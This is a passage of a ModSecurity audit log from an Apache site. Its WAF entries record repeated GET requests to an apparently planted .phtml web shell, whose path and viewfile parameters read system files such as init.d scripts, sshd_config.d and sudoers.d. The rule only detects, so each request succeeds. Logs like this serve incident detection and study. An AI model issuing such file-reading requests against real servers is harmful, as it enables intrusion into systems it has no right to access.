Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/keyboard-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIho9-jD-p9NsZWnAfhwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108294972136 3818 (- - -) Stopwatch2: 1750108294972136 3818; combined=2034, p1=364, p2=1526, p3=35, p4=28, p5=81, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3ed21c34-Z-- --9e8dfd7c-A-- [17/Jun/2025:02:42:18.644268 +0530] aFCIso9-jD-p9NsZWnAfogAAAAE 216.73.216.71 60888 127.0.0.1 7081 --9e8dfd7c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fmariadb HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9e8dfd7c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5791 Connection: close Content-Type: text/html; charset=UTF-8 --9e8dfd7c-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIso9-jD-p9NsZWnAfogAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCIso9-jD-p9NsZWnAfogAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108338639285 5036 (- - -) Stopwatch2: 1750108338639285 5036; combined=2834, p1=484, p2=2197, p3=40, p4=32, p5=80, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9e8dfd7c-Z-- --f680792b-A-- [17/Jun/2025:02:43:19.203518 +0530] aFCI75VkCcfT-Z8NQYyuFwAAAAc 216.73.216.71 47046 127.0.0.1 7081 --f680792b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fssh%2Fsshd_config.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f680792b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2828 Connection: close Content-Type: text/html; charset=UTF-8 --f680792b-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/current/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/current/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCI75VkCcfT-Z8NQYyuFwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108399198173 5425 (- - -) Stopwatch2: 1750108399198173 5425; combined=3155, p1=514, p2=2463, p3=63, p4=43, p5=72, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f680792b-Z-- --d7c3d605-A-- [17/Jun/2025:02:43:19.658614 +0530] aFCI74oVQnPDyHnl9oO80gAAAAY 216.73.216.71 34638 127.0.0.1 7081 --d7c3d605-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fphp8.1-fpm HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d7c3d605-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4697 Connection: close Content-Type: text/html; charset=UTF-8 --d7c3d605-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/php8.1-fpm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCI74oVQnPDyHnl9oO80gAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/php8.1-fpm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCI74oVQnPDyHnl9oO80gAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108399653241 5449 (- - -) Stopwatch2: 1750108399653241 5449; combined=3092, p1=497, p2=2379, p3=49, p4=37, p5=130, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d7c3d605-Z-- --918d3c75-A-- [17/Jun/2025:02:44:08.032184 +0530] aFCJIFJfblPUQiSn5r17GwAAAAA 216.73.216.71 43580 127.0.0.1 7081 --918d3c75-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --918d3c75-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4128 Connection: close Content-Type: text/html; charset=UTF-8 --918d3c75-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJIFJfblPUQiSn5r17GwAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJIFJfblPUQiSn5r17GwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108448026281 5958 (- - -) Stopwatch2: 1750108448026281 5958; combined=3252, p1=439, p2=2631, p3=59, p4=36, p5=87, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --918d3c75-Z-- --eea0a765-A-- [17/Jun/2025:02:44:11.265609 +0530] aFCJI49-jD-p9NsZWnAf8QAAAAE 216.73.216.71 33676 127.0.0.1 7081 --eea0a765-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fsudoers.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fsudoers.d%2FREADME HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --eea0a765-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2996 Connection: close Content-Type: text/html; charset=UTF-8 --eea0a765-H-- Message: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/current/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/current/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/current/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJI49-jD-p9NsZWnAf8QAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/current/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJI49-jD-p9NsZWnAf8QAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108451260970 4701 (- - -) Stopwatch2: 1750108451260970 4701; combined=2421, p1=347, p2=1879, p3=74, p4=33, p5=87, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eea0a765-Z-- --0f05fe38-A-- [17/Jun/2025:02:44:11.344099 +0530] aFCJIxwcFb_n1P0IC9x-4AAAAAo 216.73.216.71 33678 127.0.0.1 7081 --0f05fe38-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fopen-vm-tools HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0f05fe38-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3719 Connection: close Content-Type: text/html; charset=UTF-8 --0f05fe38-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/open-vm-tools"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJIxwcFb_n1P0IC9x-4AAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/open-vm-tools"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJIxwcFb_n1P0IC9x-4AAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108451339636 4528 (- - -) Stopwatch2: 1750108451339636 4528; combined=2432, p1=366, p2=1892, p3=45, p4=34, p5=95, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f05fe38-Z-- --371ce877-A-- [17/Jun/2025:02:44:11.680884 +0530] aFCJI4oVQnPDyHnl9oO89QAAAAY 216.73.216.71 33716 127.0.0.1 7081 --371ce877-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fapache2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --371ce877-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5460 Connection: close Content-Type: text/html; charset=UTF-8 --371ce877-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJI4oVQnPDyHnl9oO89QAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apache2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJI4oVQnPDyHnl9oO89QAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108451676254 4684 (- - -) Stopwatch2: 1750108451676254 4684; combined=2445, p1=367, p2=1909, p3=40, p4=35, p5=94, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --371ce877-Z-- --320a9318-A-- [17/Jun/2025:02:44:14.230491 +0530] aFCJJqEB9lmWsOo-rPONwgAAAAU 216.73.216.71 34072 127.0.0.1 7081 --320a9318-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fgrafana-server HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --320a9318-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4559 Connection: close Content-Type: text/html; charset=UTF-8 --320a9318-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/grafana-server"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJJqEB9lmWsOo-rPONwgAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/grafana-server"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJJqEB9lmWsOo-rPONwgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108454226271 4274 (- - -) Stopwatch2: 1750108454226271 4274; combined=2235, p1=293, p2=1786, p3=39, p4=31, p5=86, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --320a9318-Z-- --7e7b3776-A-- [17/Jun/2025:02:44:56.384081 +0530] aFCJUKRT9PYLci8mxb0XZQAAAAM 216.73.216.71 40936 127.0.0.1 7081 --7e7b3776-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fhwclock.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7e7b3776-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4581 Connection: close Content-Type: text/html; charset=UTF-8 --7e7b3776-E-- --7e7b3776-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJUKRT9PYLci8mxb0XZQAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id 